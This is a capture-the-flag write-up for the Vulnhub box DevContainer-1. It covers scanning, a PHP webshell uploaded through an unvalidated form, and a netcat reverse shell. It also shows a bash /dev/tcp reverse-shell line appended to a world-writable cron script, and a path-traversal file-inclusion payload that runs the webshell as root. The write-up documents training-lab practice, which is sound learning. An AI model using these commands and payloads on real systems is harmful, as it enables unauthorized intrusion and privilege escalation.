Vulnhub: DevContainer-1

DevContainer-1 is an beginner-intermediate box from Vulnhub. It has a really cool privelege escalation step. 😀

Scanning:

Nmap scan report for 192.168.56.123
Host is up (0.00017s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http

More Scanning:

crazyeights@es-base:~$ nmap -A -p- 192.168.56.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-24 13:03 EDT
Nmap scan report for 192.168.56.123
Host is up (0.000096s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Freelancer - Start Bootstrap Theme

Web

Web Enum:

crazyeights@es-base:~$ dirb http://192.168.56.123

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Oct 24 13:04:52 2020
URL_BASE: http://192.168.56.123/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.123/ ----
==> DIRECTORY: http://192.168.56.123/css/                                      
==> DIRECTORY: http://192.168.56.123/fonts/                                    
==> DIRECTORY: http://192.168.56.123/img/                                      
+ http://192.168.56.123/index.html (CODE:200|SIZE:27263)                       
==> DIRECTORY: http://192.168.56.123/js/                                       
+ http://192.168.56.123/license (CODE:200|SIZE:11336)                          
==> DIRECTORY: http://192.168.56.123/mail/                                     
+ http://192.168.56.123/server-status (CODE:403|SIZE:279)                      
==> DIRECTORY: http://192.168.56.123/upload/                                   
[SNIP]                                                                               
---- Entering directory: http://192.168.56.123/upload/files/ ----
                                                                               
-----------------
END_TIME: Sat Oct 24 13:05:02 2020
DOWNLOADED: 41508 - FOUND: 4
crazyeights@es-base:~$ 

File Upload Dir:

Doesn’t look like they every did file extension validation:

<title>In construction</title>
Allowed file types: jpg,gif,png,zip,txt,xls,doc
<!--I need to validate file extensions-->

Testing the upload functionality:

To find the directory where the file gets uploaded to

File gets uploaded to:

http://192.168.56.123/upload/files/playing-card-icon-png-favpng-4y5r4Fw9K8A5vPjnaZyCfKsGN.jpg

Testing uploading a php file:

Using a webshell, because I am curious if it will work.

http://192.168.56.123/upload/files/caf7e7bf96a799f0547469cb698bfb68.php

Neat:

Now for proper reverse shell:

  • Using pentest monkey php reverse shell

  • Start listener:

crazyeights@es-base:~$ nc -lvp 1234
listening on [any] 1234 ...

www-data shell:

connect to [192.168.56.1] from (UNKNOWN) [192.168.56.123] 37218
Linux 06502074cfda 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 17:13:03 up 11 min,  0 users,  load average: 0.04, 0.13, 0.13
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

In Maintenance-Web-Docker in www/html:

130351 -rwxrwxrwx  1 root root  164 Sep 13 04:23 list.sh
130349 -rwxr-xr-x  1 root root  204 Sep 12 21:31 maintenance.sh
130341 -rw-r--r--  1 1000 1000  442 Oct 24 17:15 out.txt

We find this script which might be run using a cronjob:

$ cat list.sh
#!/bin/bash
date >> /home/richard/web/Maintenance-Web-Docker/out.txt
ls /home/richard/web/upload/files/ | wc -l >> /home/richard/web/Maintenance-Web-Docker/out.txt

The script is being run every minute, as can be seen by the output in out.txt:

$ cat out.txt
[SNIP]
Sat 24 Oct 2020 01:13:01 PM EDT
2
Sat 24 Oct 2020 01:14:01 PM EDT
3

Trying to use the list script to get elevated privileges:

Start a listener:

nc -lvp 9999
$ echo "/bin/bash -i >& /dev/tcp/192.168.56.1/9999 0>&1" >> list.sh

Getting richard (user):

crazyeights@es-base:~$ nc -lvp 9999
listening on [any] 9999 ...
192.168.56.123: inverse host lookup failed: Unknown host
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.123] 45626
bash: cannot set terminal process group (1166): Inappropriate ioctl for device
bash: no job control in this shell
richard@EC2:~$ ls
ls
HackTools
user.txt
web
richard@EC2:~$ cat user.txt
cat user.txt
3a6b99f59ea363803bcafc7f5dd9b1e8
richard@EC2:~$ 

Checking out web:

There is a copy(?) of the site in www/html:

richard@EC2:~$ cd web
cd web
richard@EC2:~/web$ ls
ls
css
font-awesome
fonts
img
index.html
js
less
license
mail
Maintenance-Web-Docker
readme.md
upload

Checking out HackTools:

richard@EC2:~$ cd HackTools	
cd HackTools
richard@EC2:~/HackTools$ ls
ls
README.txt
socat
richard@EC2:~/HackTools$ cat README.txt
cat README.txt
Richard, it's annoying to lose bash, try:
( sudo socat [...] ) &

As soon as I read Richard, it's annoying to lose bash,, i was like ohh noo what if I lose bash and have to start over…

Checking if richard can run socat as root

richard@EC2:~/HackTools$ sudo -l
sudo -l
Matching Defaults entries for richard on EC2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on EC2:
    (ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork
        TCP\:127.0.0.1\:90

He cannot but he can run something else

Trying to run the command as user root:

richard@EC2:~/HackTools$ sudo -u root /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90

We now have a webserver running as root, if we can execute commands, or read files through it then we can find a way to get root access.

You can now access the development site at localhost:8080:

Looks like LFI:

http://192.168.56.123:8080/index.php?view=about-us.html

Let’s see if I can find my nifty webshell to reuse:

Since the maintenance script copies all uploads to richards web folder, reuse my shell with this process which is running as root.

http://192.168.56.123:8080/index.php?view=../../../../../../../../../home/richard/web/upload/files/caf7e7bf96a799f0547469cb698bfb68.php

Neat:

Checking /root:

Getting root flag:

I could have gotten a real shell from here but I didn’t 🤫

FIN.